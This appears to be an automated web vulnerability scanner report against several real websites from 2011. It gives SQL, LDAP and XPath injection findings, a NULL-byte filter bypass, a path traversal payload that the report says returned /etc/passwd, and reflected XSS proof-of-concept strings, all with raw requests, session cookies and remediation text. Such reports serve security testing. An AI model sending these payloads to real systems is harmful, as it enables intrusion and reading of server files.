SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/flairviewhcprod%00'/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA09858516231B-400001A4A00530FD&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: analytic.hotelclub.com Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DA09858516231B-400001A4A00530FD[CE]
Response 1
HTTP/1.1 404 Not Found Date: Sun, 24 Apr 2011 12:33:17 GMT Server: Omniture DC/2.0.0 Content-Length: 420 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/flairviewhcprod was not found on this server.</ ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/flairviewhcprod%00''/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA09858516231B-400001A4A00530FD&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: analytic.hotelclub.com Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DA09858516231B-400001A4A00530FD[CE]
Response 2
HTTP/1.1 404 Not Found Date: Sun, 24 Apr 2011 12:33:17 GMT Server: Omniture DC/2.0.0 xserver: www432 Content-Length: 0 Content-Type: text/html
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1 Host: www.hotelclub.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q='
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1'; __utmc=252293142; __utmb=252293142.1.10.1303613812
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<meta name="msvalidate.01 ...[SNIP]... </strong> Affordable web host for intermediate users, though installation problems; no domain privacy and advertising on error pages are drawbacks</div> ...[SNIP]...
Request 2
GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1''; __utmc=252293142; __utmb=252293142.1.10.1303613812
The script parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
The payload ../../../../../../../../../../proc/cpuinfo../../../../../../../../etc/passwd was submitted in the script parameter. The requested file was returned in the application's response.
Issue background
File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.
This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.
Issue remediation
Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.
If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:
User-controllable data should be strictly validated before being passed to any filesystem operation. In particular, input containing dot-dot sequences should be blocked.
After validating user input, the application can use a suitable filesystem API to verify that the file to be accessed is actually located within the base directory used by the application. In Java, this can be achieved by instantiating a java.io.File object using the user-supplied filename and then calling the getCanonicalPath method on this object. If the string returned by this method does not begin with the name of the start directory, then the user has somehow bypassed the applicationís input filters, and the request should be rejected. In ASP.NET, the same check can be performed by passing the user-supplied filename to the System.Io.Path.GetFullPath method and checking the returned string in the same way as described for Java.
The directory used to store files that are accessed using user-controllable data can be located on a separate logical volume to other sensitive application and operating system files, so that these cannot be reached via path traversal attacks. In Unix-based systems, this can be achieved using a chrooted filesystem; on Windows, this can be achieved by mounting the base directory as a new logical drive and using the associated drive letter to access its contents.
Request
GET /includes/javascript.php?script=../../../../../../../../../../proc/cpuinfo../../../../../../../../etc/passwd HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142
The pid parameter appears to be vulnerable to LDAP injection attacks.
The payloads 6b8420a4611b3464)(sn=* and 6b8420a4611b3464)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Issue background
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Issue background
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
Request
GET /js/prototype.js'?45cfd1b2f5 HTTP/1.1 Host: www.trustedid.com Connection: keep-alive Referer: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN
/* Prototype JavaScript framework, version 1.6.0.1 * (c) 2005-2007 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototyp ...[SNIP]... Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') == -1, MobileSafari: !!navigator.userAgent.match(/Apple.*Mobile.*Safari/) },
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the labels request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f993c"-alert(1)-"20f0488e922 was submitted in the labels parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369f993c"-alert(1)-"20f0488e922&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 3/f/192/%2a/k%3B240320597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369f993c"-alert(1)-"20f0488e922&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY ...[SNIP]...
The value of the redirecturl2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 499fc"-alert(1)-"cfc85e2b456 was submitted in the redirecturl2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=499fc"-alert(1)-"cfc85e2b456 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=499fc"-alert(1)-"cfc85e2b456http://www.metropcs.com/android?utm_source=DART&utm_medium=Display%2BMedia&utm_campaign=MPCS%2BGM%2BQ2%2BInterim%2B(5403001)"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque ...[SNIP]...
The value of the rtbdata2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f76fe"-alert(1)-"0f47eb8b094 was submitted in the rtbdata2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQIf76fe"-alert(1)-"0f47eb8b094&redirecturl2=;ord=43369? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... gXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQIf76fe"-alert(1)-"0f47eb8b094&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29"); var fscUrl = url; var fsc ...[SNIP]...
The value of the rtbip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23c5b"-alert(1)-"62d3592bb19 was submitted in the rtbip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.14923c5b"-alert(1)-"62d3592bb19&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
